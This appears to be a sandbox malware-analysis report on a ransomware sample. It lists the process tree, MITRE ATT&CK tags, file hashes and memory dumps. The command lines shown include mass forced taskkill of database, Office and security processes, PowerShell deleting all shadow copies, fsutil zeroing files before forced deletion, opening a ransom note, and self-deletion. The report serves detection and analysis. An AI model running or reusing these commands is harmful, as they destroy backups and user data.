- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3620

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4356

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5136

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5216

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5320

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5180

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5416

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5504

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5536

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5740

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:6452

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:6464

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:4976

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:5932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2⤵
PID:6516

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:6036

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
93d96cb2aa88e65c7ff6b8856eef08a7

SHA1
db2979d08e784e750ec7dc860205f7a5be10b4fc

SHA256
8d11f3a63f12ef8a3fb1bca920508f8d6ef6f3220f6d10b40c47ac2ad48d7e71

SHA512
5135293950b2bcac9e86fe8200610b296f3dc19c010bb596ff1a76a7f4fe4b7cae7f39b06a2c8944c864b396866e6db117f83dfaa0b4dd773b9b0e068be9d2de

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
MD5
70d3a5e987a572d3211bd400392442b1

SHA1
b2b2ab288b3490d32a29d9d36f17c3ac46536e61

SHA256
59b2a711e320ba503e5a0c78fbdc0de7bd963c206b418ae8ce084e57ed76cf9c

SHA512
b90910c46ccc59edda8597dddfc8dab169ef02e50a6a3faf4ed98349f0b636a46693b15dacd899982fd71bb4f91eee9a2bcd238d1d6b715857b2f0b2481d13ec

Download Submit
memory/208-43-0x0000000000000000-mapping.dmp

Download
memory/216-29-0x0000000000000000-mapping.dmp

Download
memory/380-18-0x0000000000000000-mapping.dmp

Download
memory/528-20-0x0000000000000000-mapping.dmp

Download
memory/636-21-0x0000000000000000-mapping.dmp

Download
memory/664-47-0x0000000000000000-mapping.dmp

Download
memory/712-14-0x0000000000000000-mapping.dmp

Download
memory/828-40-0x0000000000000000-mapping.dmp

Download
memory/1396-30-0x0000000000000000-mapping.dmp

Download
memory/1436-22-0x0000000000000000-mapping.dmp

Download
memory/1616-35-0x0000000000000000-mapping.dmp

Download
memory/1620-23-0x0000000000000000-mapping.dmp

Download
memory/1876-24-0x0000000000000000-mapping.dmp

Download
memory/2116-27-0x0000000000000000-mapping.dmp

Download
memory/2268-33-0x0000000000000000-mapping.dmp

Download
memory/2364-38-0x0000000000000000-mapping.dmp

Download
memory/2380-25-0x0000000000000000-mapping.dmp

Download
memory/2608-26-0x0000000000000000-mapping.dmp

Download
memory/2676-28-0x0000000000000000-mapping.dmp

Download
memory/3468-6-0x0000000000000000-mapping.dmp

Download
memory/3560-8-0x0000000000000000-mapping.dmp

Download
memory/3568-7-0x0000000000000000-mapping.dmp

Download
memory/3620-46-0x0000000000000000-mapping.dmp

Download
memory/3656-41-0x0000000000000000-mapping.dmp

Download
memory/3824-9-0x0000000000000000-mapping.dmp

Download
memory/3896-42-0x0000000000000000-mapping.dmp

Download
memory/3920-34-0x0000000000000000-mapping.dmp

Download
memory/4052-17-0x0000000000000000-mapping.dmp

Download
memory/4128-5-0x0000000000000000-mapping.dmp

Download
memory/4192-15-0x0000000000000000-mapping.dmp

Download
memory/4212-36-0x0000000000000000-mapping.dmp

Download
memory/4228-39-0x0000000000000000-mapping.dmp

Download
memory/4244-11-0x0000000000000000-mapping.dmp

Download
memory/4280-12-0x0000000000000000-mapping.dmp

Download
memory/4296-37-0x0000000000000000-mapping.dmp

Download
memory/4300-13-0x0000000000000000-mapping.dmp

Download
memory/4356-31-0x0000000000000000-mapping.dmp

Download
memory/4376-45-0x0000000000000000-mapping.dmp

Download
memory/4432-16-0x0000000000000000-mapping.dmp

Download
memory/4524-19-0x0000000000000000-mapping.dmp

Download
memory/4596-32-0x0000000000000000-mapping.dmp

Download
memory/4624-44-0x0000000000000000-mapping.dmp

Download
memory/4816-2-0x00007FFBE4620000-0x00007FFBE500C000-memory.dmp

Filesize
9.9MB

Download
memory/4816-10-0x000000001B0C0000-0x000000001B0C2000-memory.dmp

Filesize
8KB

Download
memory/4816-3-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/4976-70-0x0000000000000000-mapping.dmp

Download
memory/5136-48-0x0000000000000000-mapping.dmp

Download
memory/5180-49-0x0000000000000000-mapping.dmp

Download
memory/5216-50-0x0000000000000000-mapping.dmp

Download
memory/5320-51-0x0000000000000000-mapping.dmp

Download
memory/5380-52-0x0000000000000000-mapping.dmp

Download
memory/5416-53-0x0000000000000000-mapping.dmp

Download
memory/5504-54-0x0000000000000000-mapping.dmp

Download
memory/5536-55-0x0000000000000000-mapping.dmp

Download
memory/5680-56-0x0000000000000000-mapping.dmp

Download
memory/5708-57-0x0000000000000000-mapping.dmp

Download
memory/5740-64-0x000002CCB98D3000-0x000002CCB98D5000-memory.dmp

Filesize
8KB

Download
memory/5740-60-0x000002CCA11F0000-0x000002CCA11F1000-memory.dmp

Filesize
4KB

Download
memory/5740-63-0x000002CCB98D6000-0x000002CCB98D8000-memory.dmp

Filesize
8KB

Download
memory/5740-59-0x00007FFBE4620000-0x00007FFBE500C000-memory.dmp

Filesize
9.9MB

Download
memory/5740-62-0x000002CCB98D0000-0x000002CCB98D2000-memory.dmp

Filesize
8KB

Download
memory/5740-61-0x000002CCBC240000-0x000002CCBC241000-memory.dmp

Filesize
4KB

Download
memory/5740-58-0x0000000000000000-mapping.dmp

Download
memory/5932-73-0x0000000000000000-mapping.dmp

Download
memory/6036-72-0x0000000000000000-mapping.dmp

Download
memory/6452-67-0x0000000000000000-mapping.dmp

Download
memory/6464-68-0x0000000000000000-mapping.dmp

Download
memory/6516-69-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads